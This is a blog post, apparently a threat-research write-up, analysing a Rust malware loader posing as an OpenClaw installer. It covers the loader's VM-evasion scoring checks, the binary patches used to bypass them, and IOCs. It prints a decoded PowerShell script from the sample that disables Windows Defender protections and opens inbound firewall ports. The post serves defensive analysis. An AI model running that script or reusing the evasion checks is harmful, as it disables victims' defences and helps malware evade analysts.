{"id":366,"date":"2026-03-11T18:07:54","date_gmt":"2026-03-11T18:07:54","guid":{"rendered":"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/11\/vms-need-not-apply-notopenclaw-malware-analysis\/"},"modified":"2026-03-11T18:07:54","modified_gmt":"2026-03-11T18:07:54","slug":"vms-need-not-apply-notopenclaw-malware-analysis","status":"publish","type":"post","link":"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/11\/vms-need-not-apply-notopenclaw-malware-analysis\/","title":{"rendered":"VMs Need Not Apply: NotOpenClaw Malware Analysis"},"content":{"rendered":"<h4>The malware loader that takes VM\/sandbox evasion seriously.<\/h4>\n<figure><img data-opt-id=771569372  fetchpriority=\"high\" decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*QgUKxM1tpONKM4jnOaTMEQ.png\" \/><figcaption>Original image from OpenClaw\u2019s GitHub repo. Image modified by\u00a0Copilot.<\/figcaption><\/figure>\n<p>Surprise, surprise\u2026 during a time when you can\u2019t even type the letter \u201co\u201d in a search engine without immediately seeing it include \u201c-penclaw\u201d in the suggestions, threat actors have been trying to capitalize on the popularity of this new super agentic AI solution.<\/p>\n<p>So when I did my usual \u201ceenie meenie miney mo\u201d malware selection process on MalwareBazaar, I randomly tried the query tag:openclaw. When I found a few samples submitted over the weekend, I downloaded the first one I found\u2026 using my <a href=\"https:\/\/medium.com\/the-first-digit\/building-a-secure-personal-reverse-engineering-lab-650280a2c8a9\">new, more secure sample collection process<\/a>. 
It also had the tag of VidarStealer, so I went into this analysis assuming the usual hallmarks of a stealer, such as enumerating credential stores, keylogging, etc.<\/p>\n<p>Since I didn\u2019t collect this sample in a more \u201cfun\u201d way like directly from a phishing site, I wanted to get a little context on it, so I did a simple Google search for the SHA-256 hash, and realized this sample was featured in an intel article just earlier this\u00a0week:<\/p>\n<p><a href=\"https:\/\/www.huntress.com\/blog\/openclaw-github-ghostsocks-infostealer\">How Fake OpenClaw Installers Spread GhostSocks Malware | Huntress<\/a><\/p>\n<p>I didn\u2019t go much further than learning about the lure (Bing AI search results for \u201cOpenClaw Windows\u201d) and confirming the hash was contained within that article, and set out to see what I could find on my own before actually seeing what the findings\u00a0were\u2026<\/p>\n<h3>Static Anti-Analysis<\/h3>\n<ul>\n<li>Original Filename: TradeAI.exe<\/li>\n<li>Operation system: Windows(Vista)[AMD64, 64-bit,\u00a0GUI]<\/li>\n<li>Linker: Microsoft Linker(14.36.35723)<\/li>\n<li>Compiler: Microsoft Visual C\/C++(19.36.35403)[C++]<\/li>\n<li><strong>(Heur)Language: Rust<\/strong><\/li>\n<li>Library: Direct3D<\/li>\n<li>Library: OpenGL<\/li>\n<li>Tool: Visual Studio(2022, v17.6)<\/li>\n<li><strong>(Heur)Packer: Compressed or packed data[High entropy + Section 1 (\u201c.rdata\u201d) compressed]<\/strong><\/li>\n<li>Debug data: Binary[Offset=0x05871ce4,Size=0x24]<\/li>\n<\/ul>\n<figure><img data-opt-id=71223131  fetchpriority=\"high\" decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/640\/1*cM2uHYm_5TgxknuRX3ZI3Q.gif\" \/><figcaption>Rust? 
High\u00a0entropy?<\/figcaption><\/figure>\n<p>So I go to the official OpenClaw GitHub repo and what do I\u00a0see?<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*xOoGVID-qGgL3AiJNSVkgw.png\" \/><figcaption>\u2026a distinct lack of\u00a0Rust.<\/figcaption><\/figure>\n<p>There is a repo for IronClaw (a Rust fork), but based on the original lure, this sample was imitating the base OpenClaw Windows. Rust should play no part\u00a0here.<\/p>\n<p>I\u2019m able to immediately confirm that this was written in Rust by looking at the\u00a0strings:<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*OmBUvSk72I7dD5CjvteT6w.png\" \/><\/figure>\n<p>Also, interestingly, this actor\u2019s Windows username is \u201croot\u201d, which is not quite enough for attribution, but something to note if it\u2019s seen across multiple\u00a0samples:<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*RD0Fy-StEM4z-wHdxHEewg.png\" \/><\/figure>\n<p>Also, in the sub_140089dda function, I see a <em>massive<\/em> set of conditions and\u00a0jumps:<\/p>\n<figure><img data-opt-id=576406888  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/485\/1*KkuXejgSK_f5j466TppnbQ.png\" \/><figcaption>This is only a\u00a0snippet.<\/figcaption><\/figure>\n<p>These are all seemingly based around anti-analysis after discovering it\u2019s running in a\u00a0VM:<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*wdKQVxTWeTVE5bLY-nUsnw.png\" \/><\/figure>\n<p>Needless to say, I\u2019m expecting very extensive anti-analysis capabilities.<\/p>\n<figure><img data-opt-id=1837913559  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/480\/1*GaZLuaNvqkrH0A-JNlBrIg.gif\" 
\/><figcaption>It\u2019s what I do\u00a0best.<\/figcaption><\/figure>\n<h3>Dynamic Anti-Analysis<\/h3>\n<p>So after detonation, my original hypothesis that this malware incorporates some anti-analysis function to prevent it from running in a virtualized environment is proven correct\u00a0with:<\/p>\n<figure><img data-opt-id=1008138107  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/468\/1*Rpd2zWCgAZhvR8-BW966sg.gif\" \/><\/figure>\n<p>It first appears to attempt to reach a C2 server, but if it\u2019s unable to, it triggers the anti-analysis function, which you can see in the memory\u00a0dump:<\/p>\n<figure><img data-opt-id=168502285  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/616\/1*Ip6yOXqV7vq9o9-mVXQC-Q.png\" \/><\/figure>\n<p>This is just the tip of the iceberg. There are many many <em>many<\/em> (MANY) checks that this malware does to ensure it\u2019s not running in a virtual environment.<\/p>\n<p>One of the first things it does is run a simple ipconfig command, presumably to enumerate for any indications the infected system has a typical VMware or Vbox MAC\u00a0address.<\/p>\n<p>I actually spent a considerable amount of time removing all of the potential artifacts consistent with a VM, but after failure after failure, I decided on a different tactic.<\/p>\n<p>It\u2019s not just checking for ipconfig results, but a host of various artifacts about the infected system, whilst also applying a points system to each individual check. If an infected system goes below the threshold, it triggers the anti-analysis function. This can be seen\u00a0here:<\/p>\n<figure><img data-opt-id=297842202  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/581\/1*QQ3dCQyUQtpvUQfbmRNlEw.png\" \/><\/figure>\n<p>At this address, 00007FF78FA74F51, this appears to be the decision point where the malware applied a score to each system check it does on the infected host. 
After reaching a certain threshold, it will display a message box and terminate itself. If it doesn\u2019t hit that threshold, it will allow execution.<\/p>\n<p>So what does it base this score\u00a0on?<\/p>\n<p>In summary, it\u2019s checking\u00a0for:<\/p>\n<ul>\n<li>It scans the first three octets of the NIC for VMware (such as 00:05:69, 00:0C:29, or 00:50:56) or VirtualBox (such as 08:00:27) prefixes.<\/li>\n<li>It flags common default gateway or DHCP ranges commonly used by hypervisors.<\/li>\n<li>It assigns bonus points or even penalties for the detected graphics card. If it detects an integrated or virtual GPU, it gives penalties.<\/li>\n<li>It also gives penalties for generic system hostnames, such as the random 8-character hostnames that are present in every fresh Windows\u00a0install.<\/li>\n<li>It also penalizes VM motherboards, looking instead to only run on known hardware manufacturers (e.g., ASUS or\u00a0MSI).<\/li>\n<li>It also enumerates the system for common RE forensic tools, unsurprisingly assigning penalties if those processes are present on the\u00a0system.<\/li>\n<\/ul>\n<p>This can be seen\u00a0here:<\/p>\n<figure><img data-opt-id=875493860  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/717\/1*epnWSQQFqeL8c2w7LkB34Q.png\" \/><\/figure>\n<p>Aaaand here:<\/p>\n<figure><img data-opt-id=433630435  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/595\/1*HMKJCdc_q4y2EFr9-IbxCw.png\" \/><\/figure>\n<p>Aaaaaaaaand here:<\/p>\n<figure><img data-opt-id=57242973  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/590\/1*5JwWmEOtjwtB3DUHydxJFw.png\" \/><figcaption>Avoid the random 8-character hostname.<\/figcaption><\/figure>\n<p>Then I find the following region:<\/p>\n<figure><img data-opt-id=500758515  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/609\/1*bbAia98UPtVozyOIP53cHw.png\" \/><\/figure>\n<p>There\u2019s a lot here, so here are the usernames it 
enumerates:<\/p>\n<ul>\n<li>malware<\/li>\n<li>virus<\/li>\n<li>sandbox<\/li>\n<li>sand box<\/li>\n<li>wdagutilityaccount<\/li>\n<li>bruno<\/li>\n<li>maltest<\/li>\n<li>currentuser<\/li>\n<li>jzekker<\/li>\n<li>Janet Van\u00a0Dyne<\/li>\n<li>Harry Johnson<\/li>\n<li>tim<\/li>\n<li>John<\/li>\n<li>cuckoo<\/li>\n<\/ul>\n<p>There are also analysis tools and executables:<\/p>\n<ul>\n<li>mon.dll<\/li>\n<li>SbieDll.dll<\/li>\n<li>SxIn.dll<\/li>\n<li>cmdvrt32.dll<\/li>\n<li>cmdvrt64.dll<\/li>\n<li>ollydbg.exe<\/li>\n<li>x32dbg.exe<\/li>\n<li>x64dbg.exe<\/li>\n<li>windbg.exe<\/li>\n<li>ida.exe<\/li>\n<li>ida64.exe<\/li>\n<li>processhacker.exe<\/li>\n<li>procexp.exe<\/li>\n<li>procexp64.exe<\/li>\n<li>wireshark.exe<\/li>\n<li>fiddler.exe<\/li>\n<li>charles.exe<\/li>\n<li>sandboxie.exe<\/li>\n<\/ul>\n<p>Virtualization:<\/p>\n<ul>\n<li>vmtoolsd.exe<\/li>\n<li>vmwaretray.exe<\/li>\n<li>vmwareuser.exe<\/li>\n<li>vboxservice.exe<\/li>\n<li>vboxtray.exe<\/li>\n<li>administrator<\/li>\n<li>googleinnotek<\/li>\n<li>WaspDESK-IVRUUH4<\/li>\n<li>Y14MARSAMAZING-A<\/li>\n<li>VOCADOO<\/li>\n<li>VirtualBox<\/li>\n<li>Google Compute\u00a0Engine<\/li>\n<li>Virtual Machine<\/li>\n<li>Xeon<\/li>\n<li>EPYC<\/li>\n<\/ul>\n<p>And finally hardware\u00a0IDs:<\/p>\n<ul>\n<li>ol_client_d+$<\/li>\n<li>08:00:27 (Prefix for VirtualBox MAC addresses)<\/li>\n<li>00:15:5D (Prefix for Hyper-V MAC addresses)<\/li>\n<li>52:54:00 (Prefix for QEMU\/KVM MAC addresses)<\/li>\n<li>MBD-R40311-3550-2146-3025-5233-5781-381234567890<\/li>\n<\/ul>\n<p>In the memory dump, there is a large seemingly base64 encoded string, which then had to be XOR-decoded, and the\u00a0results:<\/p>\n<pre># === WINDOWS DEFENDER EXCLUSIONS ===<br \/>$paths = @(<br \/>    'C:\\Users',<br \/>    \"$env:TEMP\",<br \/>    'C:\\ProgramData',<br \/>    'C:\\OneDriveTemp',<br \/>    'C:\\Users\\Public',<br \/>    'C:\\Windows'<br \/>)<br \/>foreach ($item in $paths) {<br \/>    Add-MpPreference -ExclusionPath '$item'<br \/>}<br \/><br \/># === PROCESS 
EXCLUSIONS ===<br \/>Add-MpPreference -ExclusionProcess 'powershell.exe'<br \/>Add-MpPreference -ExclusionProcess 'pwsh.exe'<br \/><br \/># === DISABLE DEFENDER TELEMETRY \/ CLOUD FEATURES ===<br \/>Set-MpPreference -MAPSReporting 0<br \/>Set-MpPreference -DisableBlockAtFirstSeen $true<br \/>Set-MpPreference -SubmitSamplesConsent NeverSend<br \/>Set-MpPreference -CloudBlockLevel 0<br \/>Set-MpPreference -PUAProtection disable<br \/><br \/># === DISABLE CORE PROTECTION FEATURES ===<br \/>Set-MpPreference -DisableIOAVProtection $true<br \/>Set-MpPreference -DisableBehaviorMonitoring $true<br \/><br \/># === FIREWALL RULES - OPEN INBOUND PORTS ===<br \/>New-NetFirewallRule -DisplayName \"Port 57001 TCP\" -Direction Inbound -LocalPort 57001 -Protocol TCP -Action Allow -Enabled True<br \/>New-NetFirewallRule -DisplayName \"Port 57002 TCP\" -Direction Inbound -LocalPort 57002 -Protocol TCP -Action Allow -Enabled True<br \/>New-NetFirewallRule -DisplayName \"Port 56001 TCP\" -Direction Inbound -LocalPort 56001 -Protocol TCP -Action Allow -Enabled True<\/pre>\n<p>This is a clear defense evasion and C2 staging script designed\u00a0to:<\/p>\n<ul>\n<li>Cover multiple writable paths (e.g., C:\\Users, %Temp%,\u00a0etc.).<\/li>\n<li>Include exclusions for PowerShell using both powershell.exe and pwsh.exe, which means that any payload that is invoked by PowerShell runs without\u00a0issue.<\/li>\n<li>Disable sample submission and block the payload(s) from being flagged by cloud\u00a0backups.<\/li>\n<li>Disable IOAV (on-access scan for downloaded content) and behavior monitoring (for heuristic-based detection).<\/li>\n<li>Open up TCP ports 57001, 57002,\u00a056001.<\/li>\n<\/ul>\n<p>Then at the RVA of 00007FF78FA73D58, I can see the IP config command where it\u2019s looking for a default NAT\u00a0address:<\/p>\n<figure><img data-opt-id=494979140  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/651\/1*0BGjCRvjtHP514gG-yPyxA.png\" \/><\/figure>\n<p>Then 
when the infected system reaches the threshold for termination:<\/p>\n<figure><img data-opt-id=1296819789  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/622\/1*g54e08JUjjucJ_0X7GIT6w.png\" \/><\/figure>\n<p>This is where the malware will decide that it will not run and terminate.<\/p>\n<p>I first tried NOPing all the many \u201clow threshold\u201d decision points leading to termination, but this was an inefficient and ultimately fruitless exercise:<\/p>\n<figure><img data-opt-id=1994845865  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/504\/1*H369TIDqvOOnPaRdoX4Zog.png\" \/><figcaption>Lots of\u00a0failure\u2026<\/figcaption><\/figure>\n<p>No matter how many times I tried, I ended up seeing that message box, but I was determined. I eventually realized that message box was being called by MessageBoxW, so I instead focused on\u00a0that.<\/p>\n<p>It took multiple tries because of the multi-threaded nature of the binary, but I finally managed to hone in on only 4 needed patches. Instead of trying to NOP the je instructions that would let me bypass a negative decision point, I instead just turned the je instructions that would say \u201csafe to execute\u201d into jne instructions.<\/p>\n<p>Then I finally saw what I was looking for this whole time\u2026 that beautiful rotating fake loading\u00a0screen:<\/p>\n<figure><img data-opt-id=1649720757  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*Ihfvjmh9n5QzykAO9pc7wA.gif\" \/><figcaption>See what\u2019s behind it? ProcMon with an Event Class is Network\u00a0filter\u2026<\/figcaption><\/figure>\n<figure><img data-opt-id=574365634  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/358\/1*d65lEW8Xr7B4jlsbh08KhA.gif\" \/><\/figure>\n<p>And would you look at that! 
There were so many TCP and UDP send\/receive events in ProcMon, I decided to go over to Wireshark, and lo and\u00a0behold:<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*Qf41vJ8DlvDbRvJAiKMKfA.png\" \/><\/figure>\n<figure><img data-opt-id=637495736  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/498\/1*C_6xtJZzUbxcz9ZpDRuyOQ.gif\" \/><\/figure>\n<p>I got some\u00a0IOCs!<\/p>\n<p>Unfortunately, I couldn\u2019t retrieve the full URLs, despite checking multiple sources from both FLARE-VM and\u00a0REMnux.<\/p>\n<h3>Summary<\/h3>\n<p>I\u2019ll be honest. I\u2019m proud of\u00a0myself.<\/p>\n<p>Binary patching isn\u2019t easy, and I managed to successfully patch probably the most sophisticated Rust-based malware loader I\u2019ve personally ever come across. I have to tip my hat to the author(s).<\/p>\n<blockquote><p>Note: Don\u2019t do cybercrime.<\/p><\/blockquote>\n<h3>Tactics, Techniques, and Procedures (TTPs)<\/h3>\n<p><a href=\"https:\/\/medium.com\/media\/a8707d08dc2c5206b87347d0ad725c89\/href\">https:\/\/medium.com\/media\/a8707d08dc2c5206b87347d0ad725c89\/href<\/a><\/p>\n<h3>Indicators of Compromise<\/h3>\n<h4>Host<\/h4>\n<p>TradeAI.exe (aka NotOpenClaw) SHA-256\u00a0hash:<\/p>\n<pre>249058ce8dc6e74cff9fb84d4d32c82e371265b40d02bb70b7955dceea008139<\/pre>\n<h4>Network<\/h4>\n<p>External IP address\u00a0check:<\/p>\n<pre>checkip.amazonaws.com<\/pre>\n<p>Domains (presumably for retrieving C2 configs or\u00a0files):<\/p>\n<pre>pastebin.com<br \/>snippet.host<\/pre>\n<blockquote><p>Please note that these sites are not malicious in and of themselves, but can be leveraged in a malware\u2019s operations to store payloads. 
If your organization has no business use case, then you can safely block them, but if you do have a business use case to allow their traffic, these IOCs can be added to detection and alerting\u00a0logic.<\/p><\/blockquote>\n<blockquote><p>If you randomly see both domains cross your firewall right before a cyber incident, you might be infected with this\u00a0loader.<\/p><\/blockquote>\n<h3>References<\/h3>\n<ul>\n<li>Intel Article: <a href=\"https:\/\/www.huntress.com\/blog\/openclaw-github-ghostsocks-infostealer\">https:\/\/www.huntress.com\/blog\/openclaw-github-ghostsocks-infostealer<\/a><\/li>\n<\/ul>\n<h3>Sample<\/h3>\n<p>Can be downloaded from MalwareBazaar by taking the SHA-256 hash and searching for it with the\u00a0query:<\/p>\n<pre>sha256:249058ce8dc6e74cff9fb84d4d32c82e371265b40d02bb70b7955dceea008139<\/pre>\n<p>fmt.Println(\u201cThanks for reading! If you enjoyed this article, please <a href=\"https:\/\/linktr.ee\/grepstrength\">check out all my\u00a0links<\/a>!&#8221;)<\/p>\n<hr \/>\n<p><a href=\"https:\/\/osintteam.blog\/vms-need-not-apply-notopenclaw-malware-analysis-1b1a68bf51fb\">VMs Need Not Apply: NotOpenClaw Malware Analysis<\/a> was originally published in <a href=\"https:\/\/osintteam.blog\/\">OSINT Team<\/a> on Medium, where people are continuing the conversation by highlighting and responding to this story.<\/p>","protected":false},"excerpt":{"rendered":"<p>The malware loader that takes VM\/sandbox evasion seriously. Original image from OpenClaw\u2019s GitHub repo. Image modified by\u00a0Copilot. 
Surprise, surprise\u2026 during a time when you can\u2019t even type the letter \u201co\u201d in a search engine without immediately seeing it include \u201c-penclaw\u201d in the suggestions, threat actors have been trying to capitalize on the popularity of this &#8230; <a title=\"VMs Need Not Apply: NotOpenClaw Malware Analysis\" class=\"read-more\" href=\"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/11\/vms-need-not-apply-notopenclaw-malware-analysis\/\" aria-label=\"Read more about VMs Need Not Apply: NotOpenClaw Malware Analysis\">Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":367,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-366","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/comments?post=366"}],"version-history":[{"count":0,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/366\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media\/367"}],"wp:attachment":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media?parent=366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/categories?post=366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/tags?post=
366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}